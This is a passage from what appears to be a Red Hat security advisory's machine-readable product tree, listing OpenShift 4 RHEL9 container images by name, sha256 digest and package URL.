"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:0cfb374c9ae690b499b72fa43e985c6593bb8a461464f57b014f22f1774059b0_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:0cfb374c9ae690b499b72fa43e985c6593bb8a461464f57b014f22f1774059b0_amd64",
"product_id": "registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:0cfb374c9ae690b499b72fa43e985c6593bb8a461464f57b014f22f1774059b0_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-api-provider-azure-rhel9@sha256%3A0cfb374c9ae690b499b72fa43e985c6593bb8a461464f57b014f22f1774059b0?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557306"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:863b30b65dfedac6d384bf7c0b69670777452f6e19a4ef3a0fe9902cd4b08bf2_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:863b30b65dfedac6d384bf7c0b69670777452f6e19a4ef3a0fe9902cd4b08bf2_amd64",
"product_id": "registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:863b30b65dfedac6d384bf7c0b69670777452f6e19a4ef3a0fe9902cd4b08bf2_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-api-provider-gcp-rhel9@sha256%3A863b30b65dfedac6d384bf7c0b69670777452f6e19a4ef3a0fe9902cd4b08bf2?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775602000"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:5cfb798541e25e1bb1592f157222a40b31b680a85336bab0c88af98606313a46_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:5cfb798541e25e1bb1592f157222a40b31b680a85336bab0c88af98606313a46_amd64",
"product_id": "registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:5cfb798541e25e1bb1592f157222a40b31b680a85336bab0c88af98606313a46_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-api-provider-openstack-rhel9@sha256%3A5cfb798541e25e1bb1592f157222a40b31b680a85336bab0c88af98606313a46?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564642"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:f7ed54888aa22a6c19700077522c97adf372f38cf4350a009e644590182fb3cb_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:f7ed54888aa22a6c19700077522c97adf372f38cf4350a009e644590182fb3cb_amd64",
"product_id": "registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:f7ed54888aa22a6c19700077522c97adf372f38cf4350a009e644590182fb3cb_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-config-rhel9-operator@sha256%3Af7ed54888aa22a6c19700077522c97adf372f38cf4350a009e644590182fb3cb?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604341"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:20b9ee6a4f6c462c2b53a6d449ed18c20a9f3917f94f08548a451e83e6f4a1c9_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:20b9ee6a4f6c462c2b53a6d449ed18c20a9f3917f94f08548a451e83e6f4a1c9_amd64",
"product_id": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:20b9ee6a4f6c462c2b53a6d449ed18c20a9f3917f94f08548a451e83e6f4a1c9_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-os-images-rhel9@sha256%3A20b9ee6a4f6c462c2b53a6d449ed18c20a9f3917f94f08548a451e83e6f4a1c9?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775619097"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:6723f26e9ad3469461e1f752819e048f819faef9cbebb6ed473d08f41393256f_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:6723f26e9ad3469461e1f752819e048f819faef9cbebb6ed473d08f41393256f_amd64",
"product_id": "registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:6723f26e9ad3469461e1f752819e048f819faef9cbebb6ed473d08f41393256f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-admission-controller-rhel9@sha256%3A6723f26e9ad3469461e1f752819e048f819faef9cbebb6ed473d08f41393256f?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604704"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:9b2dc7a7bf2ccc373348d47cb745507d6aae379b8b57c1ff828656476dd325c2_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:9b2dc7a7bf2ccc373348d47cb745507d6aae379b8b57c1ff828656476dd325c2_amd64",
"product_id": "registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:9b2dc7a7bf2ccc373348d47cb745507d6aae379b8b57c1ff828656476dd325c2_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-route-override-cni-rhel9@sha256%3A9b2dc7a7bf2ccc373348d47cb745507d6aae379b8b57c1ff828656476dd325c2?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605900"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:d23fed56ef3bfaa7b89f21cba6063cc700b6b73eebb6fb3d98077c3335dfd9fd_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:d23fed56ef3bfaa7b89f21cba6063cc700b6b73eebb6fb3d98077c3335dfd9fd_amd64",
"product_id": "registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:d23fed56ef3bfaa7b89f21cba6063cc700b6b73eebb6fb3d98077c3335dfd9fd_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-whereabouts-ipam-cni-rhel9@sha256%3Ad23fed56ef3bfaa7b89f21cba6063cc700b6b73eebb6fb3d98077c3335dfd9fd?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605545"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:c3ce5331bb023bea2bb1be11730cc3582c8de4dd8f22ed52fd531ceade69be2c_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:c3ce5331bb023bea2bb1be11730cc3582c8de4dd8f22ed52fd531ceade69be2c_amd64",
"product_id": "registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:c3ce5331bb023bea2bb1be11730cc3582c8de4dd8f22ed52fd531ceade69be2c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-must-gather-rhel9@sha256%3Ac3ce5331bb023bea2bb1be11730cc3582c8de4dd8f22ed52fd531ceade69be2c?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564698"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:84c26c0c2915619709a25cc9d5965f87517b6e5e15ee88b377bf45d9655d3d43_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:84c26c0c2915619709a25cc9d5965f87517b6e5e15ee88b377bf45d9655d3d43_amd64",
"product_id": "registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:84c26c0c2915619709a25cc9d5965f87517b6e5e15ee88b377bf45d9655d3d43_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-network-interface-bond-cni-rhel9@sha256%3A84c26c0c2915619709a25cc9d5965f87517b6e5e15ee88b377bf45d9655d3d43?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605259"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:898fde5963557880b3823bd46af8088248cb445cbe8909c8bbfe47e7887540a2_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:898fde5963557880b3823bd46af8088248cb445cbe8909c8bbfe47e7887540a2_amd64",
"product_id": "registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:898fde5963557880b3823bd46af8088248cb445cbe8909c8bbfe47e7887540a2_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-network-metrics-daemon-rhel9@sha256%3A898fde5963557880b3823bd46af8088248cb445cbe8909c8bbfe47e7887540a2?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605534"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:fa1d216867be999b74ea9e61644fe42315952afce3b6efce25308960adf393eb_amd64",
"product": {
"name": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:fa1d216867be999b74ea9e61644fe42315952afce3b6efce25308960adf393eb_amd64",
"product_id": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:fa1d216867be999b74ea9e61644fe42315952afce3b6efce25308960adf393eb_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/network-tools-rhel9@sha256%3Afa1d216867be999b74ea9e61644fe42315952afce3b6efce25308960adf393eb?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775607479"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-nutanix-cloud-controller-manager-rhel9@sha256:79ccd40e05ae0921c4d5b53ecbbd84872bd5321c5af2db3e2336aa6a133d147c_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-nutanix-cloud-controller-manager-rhel9@sha256:79ccd40e05ae0921c4d5b53ecbbd84872bd5321c5af2db3e2336aa6a133d147c_amd64",
"product_id": "registry.redhat.io/openshift4/ose-nutanix-cloud-controller-manager-rhel9@sha256:79ccd40e05ae0921c4d5b53ecbbd84872bd5321c5af2db3e2336aa6a133d147c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-nutanix-cloud-controller-manager-rhel9@sha256%3A79ccd40e05ae0921c4d5b53ecbbd84872bd5321c5af2db3e2336aa6a133d147c?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557301"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-nutanix-machine-controllers-rhel9@sha256:ea20d945814432b378647144a1bd5b9d86817d313afc11344780b85b3c3bc978_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-nutanix-machine-controllers-rhel9@sha256:ea20d945814432b378647144a1bd5b9d86817d313afc11344780b85b3c3bc978_amd64",
"product_id": "registry.redhat.io/openshift4/ose-nutanix-machine-controllers-rhel9@sha256:ea20d945814432b378647144a1bd5b9d86817d313afc11344780b85b3c3bc978_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-nutanix-machine-controllers-rhel9@sha256%3Aea20d945814432b378647144a1bd5b9d86817d313afc11344780b85b3c3bc978?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557245"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:8471d6d7d895f46fb2a5d47003f30b9912bc364b7c9e968f3f956a30892039c3_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:8471d6d7d895f46fb2a5d47003f30b9912bc364b7c9e968f3f956a30892039c3_amd64",
"product_id": "registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:8471d6d7d895f46fb2a5d47003f30b9912bc364b7c9e968f3f956a30892039c3_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-oauth-apiserver-rhel9@sha256%3A8471d6d7d895f46fb2a5d47003f30b9912bc364b7c9e968f3f956a30892039c3?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605934"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:23a38593785b8a77c82fe981e8218363e58b55273e8d66b0dde4503627f891ba_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:23a38593785b8a77c82fe981e8218363e58b55273e8d66b0dde4503627f891ba_amd64",
"product_id": "registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:23a38593785b8a77c82fe981e8218363e58b55273e8d66b0dde4503627f891ba_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-olm-catalogd-rhel9@sha256%3A23a38593785b8a77c82fe981e8218363e58b55273e8d66b0dde4503627f891ba?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604244"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:72fc95856ec7db8a502bf2b09972d63f50671593a26366a9aa56d6153459fb79_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:72fc95856ec7db8a502bf2b09972d63f50671593a26366a9aa56d6153459fb79_amd64",
"product_id": "registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:72fc95856ec7db8a502bf2b09972d63f50671593a26366a9aa56d6153459fb79_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-olm-operator-controller-rhel9@sha256%3A72fc95856ec7db8a502bf2b09972d63f50671593a26366a9aa56d6153459fb79?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604309"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:5015658d5bee0ff943bc69525816e23d34ca35ec3a818cf0130d58c8baea98b6_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:5015658d5bee0ff943bc69525816e23d34ca35ec3a818cf0130d58c8baea98b6_amd64",
"product_id": "registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:5015658d5bee0ff943bc69525816e23d34ca35ec3a818cf0130d58c8baea98b6_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openshift-apiserver-rhel9@sha256%3A5015658d5bee0ff943bc69525816e23d34ca35ec3a818cf0130d58c8baea98b6?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572127"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:269715c1fc118c5a352bb9a221e648f2fa24caabc0ae874d906e2947837b6a9a_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:269715c1fc118c5a352bb9a221e648f2fa24caabc0ae874d906e2947837b6a9a_amd64",
"product_id": "registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:269715c1fc118c5a352bb9a221e648f2fa24caabc0ae874d906e2947837b6a9a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openshift-controller-manager-rhel9@sha256%3A269715c1fc118c5a352bb9a221e648f2fa24caabc0ae874d906e2947837b6a9a?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564516"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:55f9b85e57f11e221edf4e30d65037caedd69a0a4d37d560d99225b992aa1cbb_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:55f9b85e57f11e221edf4e30d65037caedd69a0a4d37d560d99225b992aa1cbb_amd64",
"product_id": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:55f9b85e57f11e221edf4e30d65037caedd69a0a4d37d560d99225b992aa1cbb_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openstack-cinder-csi-driver-rhel9@sha256%3A55f9b85e57f11e221edf4e30d65037caedd69a0a4d37d560d99225b992aa1cbb?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606187"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:988ab0315395f8580b26df4a0ebc13f53d47dd4bfb4160489f1d24c3c118c795_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:988ab0315395f8580b26df4a0ebc13f53d47dd4bfb4160489f1d24c3c118c795_amd64",
"product_id": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:988ab0315395f8580b26df4a0ebc13f53d47dd4bfb4160489f1d24c3c118c795_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openstack-cinder-csi-driver-rhel9-operator@sha256%3A988ab0315395f8580b26df4a0ebc13f53d47dd4bfb4160489f1d24c3c118c795?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606809"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:a0fa55daf82f32ede8a24f467db6f6591c5f5810f3dfa4c5b095fe5ba8274595_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:a0fa55daf82f32ede8a24f467db6f6591c5f5810f3dfa4c5b095fe5ba8274595_amd64",
"product_id": "registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:a0fa55daf82f32ede8a24f467db6f6591c5f5810f3dfa4c5b095fe5ba8274595_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openstack-cloud-controller-manager-rhel9@sha256%3Aa0fa55daf82f32ede8a24f467db6f6591c5f5810f3dfa4c5b095fe5ba8274595?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564624"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:e80c61f3f591b4a682b352c787e1715f7d9f4f06e209ef8dc82e41b8bded9b8e_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:e80c61f3f591b4a682b352c787e1715f7d9f4f06e209ef8dc82e41b8bded9b8e_amd64",
"product_id": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:e80c61f3f591b4a682b352c787e1715f7d9f4f06e209ef8dc82e41b8bded9b8e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-operator-framework-tools-rhel9@sha256%3Ae80c61f3f591b4a682b352c787e1715f7d9f4f06e209ef8dc82e41b8bded9b8e?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605528"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:4e69689cecf4ba62c9a3b7305e80c15ad5fcccbc85fb59a7e2969e14c7fb85f3_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:4e69689cecf4ba62c9a3b7305e80c15ad5fcccbc85fb59a7e2969e14c7fb85f3_amd64",
"product_id": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:4e69689cecf4ba62c9a3b7305e80c15ad5fcccbc85fb59a7e2969e14c7fb85f3_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ovirt-csi-driver-rhel9@sha256%3A4e69689cecf4ba62c9a3b7305e80c15ad5fcccbc85fb59a7e2969e14c7fb85f3?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606167"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:e8b6d45610b94825d1f5525443529e99a5e68441a8f331e20746614a606dc475_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:e8b6d45610b94825d1f5525443529e99a5e68441a8f331e20746614a606dc475_amd64",
"product_id": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:e8b6d45610b94825d1f5525443529e99a5e68441a8f331e20746614a606dc475_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ovn-kubernetes-rhel9@sha256%3Ae8b6d45610b94825d1f5525443529e99a5e68441a8f331e20746614a606dc475?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775577363"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:3a47a587be70333ba3719bb416fb04c176e41ce27d2c051b1210717857fd9b92_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:3a47a587be70333ba3719bb416fb04c176e41ce27d2c051b1210717857fd9b92_amd64",
"product_id": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:3a47a587be70333ba3719bb416fb04c176e41ce27d2c051b1210717857fd9b92_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-powervs-block-csi-driver-rhel9@sha256%3A3a47a587be70333ba3719bb416fb04c176e41ce27d2c051b1210717857fd9b92?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775563654"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:97611bba51f02868cd922555e6c8e75d7eb4b5d8a865a69fd957084f897a5033_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:97611bba51f02868cd922555e6c8e75d7eb4b5d8a865a69fd957084f897a5033_amd64",
"product_id": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:97611bba51f02868cd922555e6c8e75d7eb4b5d8a865a69fd957084f897a5033_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-powervs-block-csi-driver-rhel9-operator@sha256%3A97611bba51f02868cd922555e6c8e75d7eb4b5d8a865a69fd957084f897a5033?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775601995"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:25f2667e3ce28ce5f0326be23f78cc6eedd523d4d2cdcfee2c02565d14d16ec2_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:25f2667e3ce28ce5f0326be23f78cc6eedd523d4d2cdcfee2c02565d14d16ec2_amd64",
"product_id": "registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:25f2667e3ce28ce5f0326be23f78cc6eedd523d4d2cdcfee2c02565d14d16ec2_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-powervs-cloud-controller-manager-rhel9@sha256%3A25f2667e3ce28ce5f0326be23f78cc6eedd523d4d2cdcfee2c02565d14d16ec2?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775563524"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:70ec66ac0b28bc34120378d962fdfe8a2f2411591611eaf6df7d4e62b8076a7f_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:70ec66ac0b28bc34120378d962fdfe8a2f2411591611eaf6df7d4e62b8076a7f_amd64",
"product_id": "registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:70ec66ac0b28bc34120378d962fdfe8a2f2411591611eaf6df7d4e62b8076a7f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-powervs-machine-controllers-rhel9@sha256%3A70ec66ac0b28bc34120378d962fdfe8a2f2411591611eaf6df7d4e62b8076a7f?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775562680"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:6c6b2ab932649b97579c8a76f57d9c8f0c8b2dededcd0843563d7bb85d116b8b_amd64",
"product": {
"name": "registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:6c6b2ab932649b97579c8a76f57d9c8f0c8b2dededcd0843563d7bb85d116b8b_amd64",
"product_id": "registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:6c6b2ab932649b97579c8a76f57d9c8f0c8b2dededcd0843563d7bb85d116b8b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/openshift-route-controller-manager-rhel9@sha256%3A6c6b2ab932649b97579c8a76f57d9c8f0c8b2dededcd0843563d7bb85d116b8b?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775565065"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:38a241d766a8321cfda212df868c63751fab60d99d8f05c671c07b39fc2dd2bf_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:38a241d766a8321cfda212df868c63751fab60d99d8f05c671c07b39fc2dd2bf_amd64",
"product_id": "registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:38a241d766a8321cfda212df868c63751fab60d99d8f05c671c07b39fc2dd2bf_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-service-ca-rhel9-operator@sha256%3A38a241d766a8321cfda212df868c63751fab60d99d8f05c671c07b39fc2dd2bf?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604108"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:99d76e0fcc4bd0f276d574ea2edad252b552301aa10e2e4241e0e9462fdd03e7_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:99d76e0fcc4bd0f276d574ea2edad252b552301aa10e2e4241e0e9462fdd03e7_amd64",
"product_id": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:99d76e0fcc4bd0f276d574ea2edad252b552301aa10e2e4241e0e9462fdd03e7_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-tools-rhel9@sha256%3A99d76e0fcc4bd0f276d574ea2edad252b552301aa10e2e4241e0e9462fdd03e7?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564250"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"product_id": "registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-vmware-vsphere-csi-driver-rhel9@sha256%3A79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557272"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"product_id": "registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-vmware-vsphere-csi-driver-rhel9@sha256%3A79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557272"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"product_id": "registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-vmware-vsphere-csi-driver-rhel9-operator@sha256%3Abcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557320"
}
}
},
{
"category": "product_version",
